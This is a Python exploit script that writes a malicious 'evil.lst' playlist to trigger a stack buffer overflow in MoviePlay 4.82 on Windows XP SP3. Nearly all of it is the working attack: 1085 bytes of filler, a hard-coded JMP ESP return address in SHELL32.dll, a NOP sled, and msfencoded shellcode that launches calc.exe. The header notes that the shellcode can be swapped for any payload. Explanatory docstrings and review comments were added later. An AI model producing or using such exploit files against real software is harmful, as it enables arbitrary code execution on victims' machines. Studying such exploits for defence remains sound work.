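#!/usr/bin/env python
# MoviePlay 4.82 (.lst) Buffer Overflow
# Author: sickness
# Download : http://www.softpedia.com/get/Multimedia/Video/Video-Players/MoviePlay.shtml
# Previous version exploit can be found here: http://www.exploit-db.com/exploits/4051/
# Tested : Windows XP Professional SP3 (EN) latest updates with IE8
# DATE : 10/02/2011
###################################################################
# You might need to change the EIP address
# The payload can be replaced with whatever you want, there is enough space.
###################################################################
"""Proof-of-concept file generator for the MoviePlay 4.82 ``.lst`` overflow.

Running this file writes ``evil.lst`` into the current directory: a playlist
whose ``FileName0`` value is long enough to overwrite the saved return address
when MoviePlay parses it.  The script only assembles a string and writes it to
disk; it does nothing else on the host.
"""

# Playlist header, spelled out in hex: "[MoviePlay]\r\nFileName0=C:\"
begin = "\x5b\x4d\x6f\x76\x69\x65\x50\x6c\x61\x79\x5d\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x30\x3d\x43\x3a\x5c"
# Filler up to the saved return address: 1085 bytes into the FileName0 value.
junk = '\x90' * 1085
# Saved-return-address overwrite: JMP ESP inside SHELL32.dll of the tested
# XP SP3 (EN) build.  The value is tied to that exact module build, which is
# why the header says it may need to change; with ASLR a static address like
# this does not hold.
eip = '\xD7\x30\x9D\x7C'  # JMP ESP SHELL32.dll
# NOP sled in front of the shellcode.
nops = '\x90' * 16
# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -t c
sc = ("\xbe\x41\x9e\x4e\xd0\x33\xc9\xda\xd7\xd9\x74\x24\xf4\xb1\x33"
      "\x58\x31\x70\x10\x83\xe8\xfc\x03\x31\x92\xac\x25\x4d\x42\xb9"
      "\xc6\xad\x93\xda\x4f\x48\xa2\xc8\x34\x19\x97\xdc\x3f\x4f\x14"
      "\x96\x12\x7b\xaf\xda\xba\x8c\x18\x50\x9d\xa3\x99\x54\x21\x6f"
      "\x59\xf6\xdd\x6d\x8e\xd8\xdc\xbe\xc3\x19\x18\xa2\x2c\x4b\xf1"
      "\xa9\x9f\x7c\x76\xef\x23\x7c\x58\x64\x1b\x06\xdd\xba\xe8\xbc"
      "\xdc\xea\x41\xca\x97\x12\xe9\x94\x07\x23\x3e\xc7\x74\x6a\x4b"
      "\x3c\x0e\x6d\x9d\x0c\xef\x5c\xe1\xc3\xce\x51\xec\x1a\x16\x55"
      "\x0f\x69\x6c\xa6\xb2\x6a\xb7\xd5\x68\xfe\x2a\x7d\xfa\x58\x8f"
      "\x7c\x2f\x3e\x44\x72\x84\x34\x02\x96\x1b\x98\x38\xa2\x90\x1f"
      "\xef\x23\xe2\x3b\x2b\x68\xb0\x22\x6a\xd4\x17\x5a\x6c\xb0\xc8"
      "\xfe\xe6\x52\x1c\x78\xa5\x38\xe3\x08\xd3\x05\xe3\x12\xdc\x25"
      "\x8c\x23\x57\xaa\xcb\xbb\xb2\x8f\x24\xf6\x9f\xb9\xac\x5f\x4a"
      "\xf8\xb0\x5f\xa0\x3e\xcd\xe3\x41\xbe\x2a\xfb\x23\xbb\x77\xbb"
      "\xd8\xb1\xe8\x2e\xdf\x66\x08\x7b\xbc\xe9\x9a\xe7\x6d\x8c\x1a"
      "\x8d\x71")
exploit = junk + eip + nops + sc
# Pad the value out to 2000 bytes.  Becomes an empty string (negative repeat
# count) if the exploit part ever grows past 2000, so the total is no longer
# fixed in that case.
rest = '\x90' * (2000 - len(exploit))
# Playlist trailer: ".mp3\r\nFileName1=\r\nNumFiles=1\r\n"
end = "\x2e\x6d\x70\x33\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x31\x3d\x0d\x0a\x4e\x75\x6d\x46\x69\x6c\x65\x73\x3d\x31\x0d\x0a"


def build_lst():
    """Return the complete playlist text: header + exploit + padding + trailer.

    Kept apart from the file write so the generated content can be inspected
    or checked without touching the filesystem.
    """
    return begin + exploit + rest + end


def main():
    """Write the playlist to ``evil.lst`` in the current directory.

    Prints "Done!" on success or the I/O error that prevented the write.  Only
    I/O errors are caught; anything else (e.g. KeyboardInterrupt) propagates
    instead of being hidden behind a generic message.
    """
    # NOTE(review): "w" is text mode, exactly as the author wrote it.  On
    # Windows each "\n" in *begin*/*end* is translated to "\r\n" (so the file
    # holds "\r\r\n"), and under Python 3 these str literals would be UTF-8
    # encoded, changing every byte >= 0x80.  The author tested this form on
    # Python 2, so the mode is left unchanged.
    try:
        with open("evil.lst", "w") as f:
            f.write(build_lst())
    except (IOError, OSError) as exc:
        print("Something went wrong: %s" % exc)
    else:
        print("Done!")


if __name__ == "__main__":
    main()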